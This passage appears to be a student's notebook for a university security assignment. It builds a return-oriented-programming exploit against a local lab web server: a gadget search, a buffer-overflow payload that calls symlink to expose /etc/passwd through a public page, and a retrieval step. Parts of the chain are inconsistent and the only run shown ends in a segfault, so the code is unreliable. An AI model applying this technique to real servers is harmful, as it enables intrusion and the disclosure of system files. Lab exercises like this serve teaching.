    print("MOV ESP Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

MOV ESP Gadget #1:
0807cff3:	mov	ebx, esp
0807cff5:	add	byte ptr [eax], al
0807cff7:	ret	


Finding Pop EAX gadget

In [None]:
n = 1
for gadget in gadgets:
  # Determine if this gadget contains POP EAX
  is_pop_eax_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'pop' and 'eax' in insn.op_str:
      is_pop_eax_gadget = True


  if is_pop_eax_gadget:
    print("POP EAX Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

POP EAX Gadget #1:
08059d84:	dec	eax
08059d85:	pop	eax
08059d86:	mov	dword ptr [ecx + 0x88], edx
08059d8c:	ret	
POP EAX Gadget #2:
08060953:	pop	esp
08060954:	add	byte ptr [eax], al
08060956:	add	byte ptr [eax], al
08060958:	pop	eax
08060959:	pop	edx
0806095a:	pop	ebx
0806095b:	ret	
POP EAX Gadget #3:
08060984:	add	byte ptr [eax], al
08060986:	add	byte ptr [eax], al
08060988:	pop	eax
08060989:	pop	edx
0806098a:	pop	ebx
0806098b:	ret	
POP EAX Gadget #4:
08062982:	jl	0x80629a8
08062984:	adc	byte ptr [ecx], al
08062986:	pop	eax
08062987:	add	al, 0x89
08062989:	ret	
POP EAX Gadget #5:
08062a33:	pop	eax
08062a34:	cmp	byte ptr [ebx + 0x5e], bl
08062a37:	ret	
POP EAX Gadget #6:
080a5945:	pop	eax
080a5946:	or	byte ptr [ecx + 0x10892048], cl
080a594c:	pop	ebx
080a594d:	ret	
POP EAX Gadget #7:
080c04a6:	shl	eax, cl
080c04a8:	mov	dword ptr [edi], eax
080c04aa:	pop	eax
080c04ab:	pop	ebx
080c04ac:	pop	esi
080c04ad:	pop	edi
080c04ae:	ret	
POP EAX Gadget #8:
080c04a7:	loopne	0x80c0432
080c04a9:	pop	e

Next, we need a gadget that will set a register (like `EAX`) to a specific value. In order to make the symlink system call, we need to set `EAX` to the system call number of symlink. Check [this page](https://syscalls32.paolostivanin.com/) for the correct system call number to set.

To achieve this, you can have two values popped from the stack and then XOR them to get the exact result you want. You may also pop one value from the stack and XOR it with a constant value. Change the following cell to find gadgets that contain an `XOR` instruction. Note that the two operands of the XOR instruction cannot be the same register.
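The arithmetic behind the XOR trick is short enough to check by hand. The sketch below assumes that the symlink system call number on 32-bit x86 is 83 (verify this against the linked table) and that a zero byte in the URL would end the overflowing copy, which is why a small number cannot simply be injected as a 32-bit word. `value_to_pop` and `has_zero_byte` are hypothetical helpers, and `0x24` is the constant from the `xor al, 0x24` gadget listed in the output of this notebook.

```python
def value_to_pop(target, xor_const, width_bits=32):
    """Value to load first so that (value ^ xor_const) equals target."""
    mask = (1 << width_bits) - 1
    return (target ^ xor_const) & mask


def has_zero_byte(value, width_bytes=4):
    """True if any byte of the little-endian encoding of value is 0x00."""
    return any(((value >> (8 * i)) & 0xFF) == 0 for i in range(width_bytes))


SYMLINK_NR = 83  # assumed i386 number for symlink; check the syscall table

print(hex(value_to_pop(SYMLINK_NR, 0x24, width_bits=8)))
print(has_zero_byte(SYMLINK_NR))
```

Since `xor al, 0x24` only touches the low byte, the upper three bytes of EAX would have to be zero already for this particular gadget to yield the full 32-bit result.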

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains XOR
  is_xor_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'xor':
      operands = insn.op_str.split(', ')
      if operands[0] != operands[1]:
        is_xor_gadget = True

  if is_xor_gadget:
    print("XOR Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

XOR Gadget #1:
0804b810:	xor	al, 0x24
0804b812:	ret	
XOR Gadget #2:
0805bc0d:	xor	al, 0x83
0805bc0f:	les	ebx, ptr [ebx + ebx*2]
0805bc12:	pop	esi
0805bc13:	pop	edi
0805bc14:	pop	ebp
0805bc15:	ret	
XOR Gadget #3:
0805e007:	xor	eax, 0x89000219
0805e00c:	ret	
XOR Gadget #4:
0805f022:	in	al, dx
0805f023:	or	al, 0xff
0805f025:	je	0x805f04b
0805f027:	xor	al, 0xe8
0805f029:	ret	
XOR Gadget #5:
08061630:	xor	byte ptr [ebx + 0x5e5b04c4], al
08061636:	ret	
XOR Gadget #6:
080625c3:	rol	byte ptr [ecx], 0x89
080625c6:	xor	al, 5
080625c9:	add	byte ptr [eax], al
080625cb:	ret	
XOR Gadget #7:
08072868:	je	0x80728b4
0807286a:	xor	byte ptr [esi + 0xf], ah
0807286d:	xlatb	
0807286e:	ret	
XOR Gadget #8:
08072869:	dec	edx
0807286a:	xor	byte ptr [esi + 0xf], ah
0807286d:	xlatb	
0807286e:	ret	
XOR Gadget #9:
08077ef1:	xor	byte ptr [ebp + 0x5e5bf465], cl
08077ef7:	pop	edi
08077ef8:	pop	ebp
08077ef9:	ret	
XOR Gadget #10:
0807d436:	xor	byte ptr [ecx], bh
0807d438:	ret	
XOR Gadget #11:
080803a7:	xor	eax, 0x81fff
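
The XOR trick described above can be checked offline before building a payload. The sketch below computes the value to pop into `EAX` for a given XOR immediate, using the immediate of XOR Gadget #3 from the listing as the example. The helper names and the set of "forbidden" bytes are assumptions for illustration; the notebook does not state which bytes the server's request parser rejects.

```python
import struct

SYMLINK_NR = 83  # symlink system call number on 32-bit x86 Linux


def preload_for_xor(target: int, xor_imm: int) -> int:
    """Return the value V to pop into EAX so that (V ^ xor_imm) == target."""
    return (target ^ xor_imm) & 0xFFFFFFFF


def bad_bytes(word: int, forbidden: bytes = b"\x00\r\n ") -> list:
    """List the bytes of the little-endian encoding of `word` that are in
    `forbidden` (an assumed set: NUL, CR, LF and space)."""
    return [b for b in struct.pack("<I", word) if b in forbidden]


xor_imm = 0x89000219  # immediate of XOR Gadget #3 in the listing above
value = preload_for_xor(SYMLINK_NR, xor_imm)
print("pop into EAX: 0x%08x" % value)
print("forbidden bytes in encoding:", bad_bytes(value))
```

For this immediate the preload value is `0x8900024a`, whose encoding contains a NUL byte. If the server stops reading at NUL (an assumption), a gadget with a different immediate would be the safer choice.
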

You also need a string that points to a file inside the `public` directory. The file must not already exist in the directory, because `symlink` fails if the link path exists. Normally you would have to use `strcpy` or `sprintf` to create the string, or delete the file using another system call. For your convenience, we injected a string that starts with `./public` into the binary. All you have to do is find this string and inject its address into the stack:

# **add ebx, ebp gadget**

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains ADD EBX, EBP
  is_add_ebx_ebp_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'add' and 'ebx, ebp' in insn.op_str:
      is_add_ebx_ebp_gadget = True


  if is_add_ebx_ebp_gadget:
    print("ADD EBX, EBP Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

ADD EBX, EBP Gadget #1:
0805c5f8:	add	ebx, ebp
0805c5fa:	ret	


# pop ecx gadget

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains POP ECX
  is_pop_ecx_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'pop' and 'ecx' in insn.op_str:
      is_pop_ecx_gadget = True


  if is_pop_ecx_gadget:
    print("POP ECX Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

POP ECX Gadget #1:
08049ee7:	clc	
08049ee9:	pop	ecx
08049eea:	pop	ebx
08049eeb:	pop	ebp
08049eec:	lea	esp, [ecx - 4]
08049eef:	ret	
POP ECX Gadget #2:
08049ee8:	clc	
08049ee9:	pop	ecx
08049eea:	pop	ebx
08049eeb:	pop	ebp
08049eec:	lea	esp, [ecx - 4]
08049eef:	ret	
POP ECX Gadget #3:
08065e11:	pop	ecx
08065e12:	add	al, 0xf6
08065e14:	ret	
POP ECX Gadget #4:
0807bb1d:	pop	ecx
0807bb1e:	add	al, 0xf7
0807bb20:	ret	


In [None]:
import lief
import os

binary = lief.parse("server")
data_section = binary.get_section('.data')
data_start = data_section.virtual_address
data_end = data_start + data_section.size

fd = os.open('server', os.O_RDONLY)
data = os.pread(fd, data_section.size, data_section.file_offset)
os.close(fd)

# Search for every occurrence of './public' in the .data section
search_string = b'./public'
path_strings = []

# The "+ 1" lets a match that ends exactly at the end of the section be found
for i in range(len(data) - len(search_string) + 1):
    if data[i:i + len(search_string)] == search_string:
        path_strings.append(data_start + i)

def find_null_terminated_str(x, start):
  # Collect bytes from `start` up to the first NUL byte or the end of x
  s = ''
  for b in x[start:]:
    if b == 0:
      break
    s += chr(b)
  return s.encode('unicode_escape')

print("Possible path strings in ./public:")
for str_addr in path_strings:
  print("%08x: %s" % (str_addr, find_null_terminated_str(data, str_addr - data_start)))

Possible path strings in ./public:
08107068: b'./public/catch_the_flag.html'


Finally, let's put all the gadgets together. Remember, you have to overwrite the stack to chain the gadgets. When a gadget reaches its `RET` instruction, it will pop the address of the next gadget from the stack and jump to it. The stack should look like this after the buffer overflow:

```
ESP + x +------------------+
        |  Extra arguments |
        +------------------+
        |      . . .       |
        +------------------+
        |  Gadget addr #3  |
        +------------------+
        |  Gadget addr #2  |
        +------------------+
        |      Garbage     |
        +------------------+
        |  Gadget addr #1  |
ESP + 0 +------------------+
```

Notice that we sometimes need to inject garbage into the stack, because a gadget may contain `POP` instructions that serve no purpose for us. Each such `POP` consumes one word from the stack, so we supply a filler word for it and the gadget's `RET` then picks up the next gadget address.
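
The layout in the diagram can be sketched as a small packing helper. The gadget addresses below are placeholders, not addresses from the `server` binary, and `pack_chain` and `FILLER` are hypothetical names introduced only for this illustration.

```python
import struct

FILLER = 0x41414141  # arbitrary garbage word consumed by an unwanted POP


def pack_chain(steps):
    """Pack a ROP chain as little-endian 32-bit words.

    Each step is (gadget_address, popped_words): the gadget address is
    followed by one word for every POP the gadget executes before its RET.
    """
    out = b""
    for addr, popped_words in steps:
        out += struct.pack("<I", addr)
        for word in popped_words:
            out += struct.pack("<I", word)
    return out


chain = pack_chain([
    (0x08040010, [FILLER]),  # placeholder gadget #1: one unwanted POP, then RET
    (0x08040020, []),        # placeholder gadget #2: no POPs
    (0x08040030, []),        # placeholder gadget #3: no POPs
])
print(chain.hex())
```

Reading the output four bytes at a time gives gadget #1, garbage, gadget #2, gadget #3, which matches the diagram from `ESP + 0` upward.
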

To make this attack work, we need **at least** the following gadgets:

* Gadget to pop a value from the stack to `EAX`
* Gadget to `XOR` `EAX` with a constant value (or another register), so that `EAX` will be the system call number of `symlink`
* Gadget to move `ESP` to `EBX`
* Gadget to add a specific offset to `EBX` to make it point to `/etc/passwd` on the stack (injected above all the gadget addresses)
* Gadget to pop an address into `ECX` so that it points to the string we found that starts with `./public`
* Gadget to make the system call
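
On 32-bit x86 Linux the system call number goes in `EAX` and the first two arguments go in `EBX` and `ECX`, so the register setup above amounts to `symlink(target, linkpath)` with `EBX` as the target and `ECX` as the link path. The sketch below shows the same call through Python's `os.symlink` in a temporary directory; the file names are made up for illustration and nothing here touches the `server` binary.

```python
import os
import tempfile


def symlink_demo():
    """Create a symlink, read through it, then try to create it again."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "secret.txt")   # plays the role of /etc/passwd
        linkpath = os.path.join(d, "page.html")  # plays the role of the ./public file
        with open(target, "w") as f:
            f.write("top secret\n")

        os.symlink(target, linkpath)             # symlink(target, linkpath)
        with open(linkpath) as f:
            content = f.read()                   # reads the target's content

        try:
            os.symlink(target, linkpath)         # link path now exists
            second_call = "succeeded"
        except FileExistsError:
            second_call = "failed: link path already exists"
    return content, second_call


content, second_call = symlink_demo()
print(repr(content))
print(second_call)
```

The second call fails because the link path already exists, which is why the file named by the `./public` string must not be present before the attack.
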

Modify the following cell to inject the necessary stream of bytes into the attack to achieve the goal:

In [None]:
!killall -9 -q server

import struct
import subprocess
import multiprocessing
import time
import socket
from IPython.display import display, HTML

def trace_server():
  p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

  # Wait for server to start
  while True:
    if "Server started" in p.stderr.readline(): break

  trace_segfault(p.pid)

proc = multiprocessing.Process(target=trace_server)
proc.start()

time.sleep(1)

# Let's use socket instead of requests
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('127.0.0.1', 8000))

###############################################################################
# Setup your ROP chain
###############################################################################

# Offset
buffer_offset = 154

# Gadget addresses
pop_eax_ret       = 0x080cb07a  # Gadget: pop eax; ret
xor_eax_ret       = 0x080803a7  # Gadget: xor eax, 0x81fff... (XOR Gadget #11; full immediate taken to be constant_val)
mov_esp_to_ebx_ret = 0x0807cff3  # Gadget: mov ebx, esp; add byte ptr [eax], al; ret (MOV ESP Gadget #1)
pop_ebp_ret       = 0x080a959a  # Gadget: pop ebp; ret (to load a constant into EBP)
add_ebx_ret       = 0x0805c5f8  # Gadget: add ebx, ebp; ret (ADD EBX Gadget #1)
pop_ecx_ret       = 0x0807bb1d  # Gadget: pop ecx; add al, 0xf7; ret (POP ECX Gadget #4); changes AL, so use it before setting EAX
syscall_gadget    = 0x080ade79  # Gadget: call dword ptr gs:[0x10]; ret (Syscall Gadget #1)
pop_ebx_ret       = 0x080abc5c  # Gadget: pop ebx; ret (going by its name; not shown in the listings above)
constant_val      = 0x81fff930  # immediate that the XOR gadget applies to EAX
return_address    = 0x804ac3a   # word placed after the syscall gadget; execution continues here afterwards

# We need to set EAX to the system call number for symlink.
# For 32-bit Linux, symlink() is usually syscall number 83.
# Using XOR Gadget #11 (at 0x080803a7, which XORs EAX with constant_val), we need to load
# into EAX a value V such that (V XOR constant_val) == 83.
#desired_eax = 83 #x53
#value_for_eax = 0x81fffc99 ^ desired_eax
#value_for_eax = value_for_eax - 0xf7
#print("%08x %d %08x" % (value_for_eax, value_for_eax, desired_eax))

# We now want EBX to point to our target string ("/etc/passwd") which we will inject.
# We assume that after the ROP chain (and any required padding) the target string
# is appended to the payload.
#rop_chain_length = 10*4    # we will push 10 addresses (each 4 bytes)
#post_chain_padding = 4      # extra padding if needed to align the stack
# The target string offset (relative to the beginning of the payload) is then:
#target_str_offset = buffer_offset + rop_chain_length + post_chain_padding
# Later, when the MOV ESP gadget loads EBX=ESP, we add an offset using add_ebx_ret.
# Here we use pop_ebp_ret to load EBP with the offset needed.
#ebx_offset = target_str_offset

# The "./public" string was found in the .data section.
public_str_addr = 0x08107068

# Build the payload.
payload  = b"a" * buffer_offset

# --- Set ECX to point to the "./public" string ---
payload += struct.pack("<I", pop_ecx_ret)           # pop ecx; ret
payload += struct.pack("<I", public_str_addr)       # address of "./public/catch_the_flag.html" in .data

# --- Set EBX to point to our injected "/etc/passwd" ---
payload += struct.pack("<I", pop_ebx_ret)           # pop ebx; ret  (loads the next word into EBX)
payload += struct.pack("<I", 0xffffff8c)            # value popped into EBX: -0x74 as a signed 32-bit integer
payload += struct.pack("<I", add_ebx_ret)           # add ebx, ebp; ret  (EBX = EBP - 0x74, intended to point to "/etc/passwd")

# --- Set EAX = 83 ---
payload += struct.pack("<I", pop_eax_ret)           # pop eax; ret
payload += struct.pack("<I", 0x53 ^ constant_val)   # load V so that V XOR constant_val == 83 (0x53)
payload += struct.pack("<I", xor_eax_ret)           # XOR gadget computes: eax = 83

# # --- Set EBX to point to our injected "/etc/passwd" ---
# payload += struct.pack("<I", mov_esp_to_ebx_ret)    # mov ebx, esp; ret  (now EBX == address of ROP chain)
# payload += struct.pack("<I", pop_ebp_ret)           # pop ebp; ret gadget to load a constant into EBP
# payload += struct.pack("<I", ebx_offset)            # the offset (from current ESP) to our target string
# payload += struct.pack("<I", add_ebx_ret)           # add ebx, ebp; ret  (now EBX points to "/etc/passwd")


# --- Set ECX to point to the "./public" string ---
# payload += struct.pack("<I", pop_ecx_ret)           # pop ecx; ret
# payload += struct.pack("<I", public_str_addr)       # address of "./public/catch_the_flag.html" in .data

# --- Finally, invoke the system call ---
payload += struct.pack("<I", 0x080adeb9)        # gadget that makes the system call
payload += struct.pack("<I", return_address)

# (Optional) Add any extra padding required by gadgets that pop values
#payload += b"b" * post_chain_padding

# --- Append the "/etc/passwd" string (target for symlink) ---

payload += b"/etc/passwd\0"
#print("Payload length: %d" % len(payload))
#print("Payload: %s" % payload.hex())

# TODO: Manipulate the following command to crash the server
req = "GET /".encode() + payload + " HTTP/1.1\r\nConnection: close\r\n\r\n".encode()
client_socket.sendall(req)

# Wait for the response and display it
r = client_socket.recv(4096)
client_socket.close()
display(HTML(r.decode()))

# Kill the server
proc.terminate()
proc.join()

Continue process execution
Wait next process event...
New process created: pid = 9347
Segmentation fault in process 9347
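
The chain above pops `0xffffff8c` into `EBX` and then adds `EBP` to it. A short sketch of why that word acts as a negative offset in 32-bit arithmetic follows; the helper names and the sample `EBP` value are hypothetical and are not taken from a real run of the server.

```python
import struct


def to_signed32(x: int) -> int:
    """Interpret a 32-bit word as a two's-complement signed integer."""
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x & 0x80000000 else x


def add32(a: int, b: int) -> int:
    """Add two words the way a 32-bit ADD does (wrap around at 2**32)."""
    return (a + b) & 0xFFFFFFFF


addend = 0xffffff8c
print(to_signed32(addend))            # signed view of the addend

sample_ebp = 0xffffd000               # hypothetical EBP value, for illustration only
print(hex(add32(sample_ebp, addend)))
```

With the sample value the sum is `0xffffcf8c`, that is `0x74` bytes below the sample `EBP`. The same word is produced by `struct.pack("<i", -0x74)`, which can be easier to read in a payload than the raw hexadecimal constant.
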


If your attack works, you should be able to rerun the server and retrieve the content of `/etc/passwd` by requesting `./public/catch_the_flag.html`, which is now the symbolic link you created:

In [None]:
import subprocess
import time
import requests
from IPython.display import display, HTML

# Kill any running instances of the server
subprocess.run(["killall", "-9", "-q", "server"], check=False)

# Start the server process
p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

# Wait for the server to start
while True:
    if "Server started" in p.stderr.readline():
        break

time.sleep(1)

# Attempt to access the created symbolic link
r = requests.get('http://127.0.0.1:8000/public/catch_the_flag.html', stream=True)

# Display the response (should be the contents of /etc/passwd)
display(HTML(r.text))
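
Independently of the HTTP request, the link can also be inspected on disk. This is a minimal sketch that assumes the notebook's working directory is the one containing `public`; `describe_link` is a hypothetical helper, and the temporary directory only demonstrates what it returns.

```python
import os
import tempfile


def describe_link(path):
    """Return the symlink target of `path`, or None if it is not a symlink."""
    if os.path.islink(path):
        return os.readlink(path)
    return None


# Demonstration on a throwaway link, so the helper's behavior is visible
with tempfile.TemporaryDirectory() as d:
    demo_link = os.path.join(d, "demo.html")
    os.symlink("/etc/passwd", demo_link)
    demo_target = describe_link(demo_link)
    demo_missing = describe_link(os.path.join(d, "missing.html"))

print(demo_target, demo_missing)

# After the attack, this would show where the injected link points (or None)
print(describe_link("./public/catch_the_flag.html"))
```

A result of `/etc/passwd` on the last line would indicate that the `symlink` call went through; `None` means the path is missing or is a regular file.
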


Finally, please write down an explanation of every gadget you used for this attack in the next cell.

Your answer: I have added comments in the code explaining why I use each gadget.

pop_eax_ret       = 0x080cb07a  # Gadget: pop eax; ret

xor_eax_ret       = 0x080803a7  # Gadget: xor eax, 0x81fff... (XOR Gadget #11)

mov_esp_to_ebx_ret = 0x0807cff3  # Gadget: mov ebx, esp; add byte ptr [eax], al; ret (MOV ESP Gadget #1)

pop_ebp_ret       = 0x080a959a  # Gadget: pop ebp; ret (to load a constant into EBP)

add_ebx_ret       = 0x0805c5f8  # Gadget: add ebx, ebp; ret (ADD EBX Gadget #1)

pop_ecx_ret       = 0x0807bb1d  # Gadget: pop ecx; add al, 0xf7; ret (POP ECX Gadget #4, to load the address of the "./public/catch_the_flag.html" string)

syscall_gadget    = 0x080ade79  # Gadget: call dword ptr gs:[0x10]; ret (Syscall Gadget #1)


## Submission

Once you have finished this notebook, click "File > Download > Download as .ipynb" and upload the file to **Assignment 2** on Microsoft Teams and click "Turn In".

## Reference

Please cite all of your sources, if any.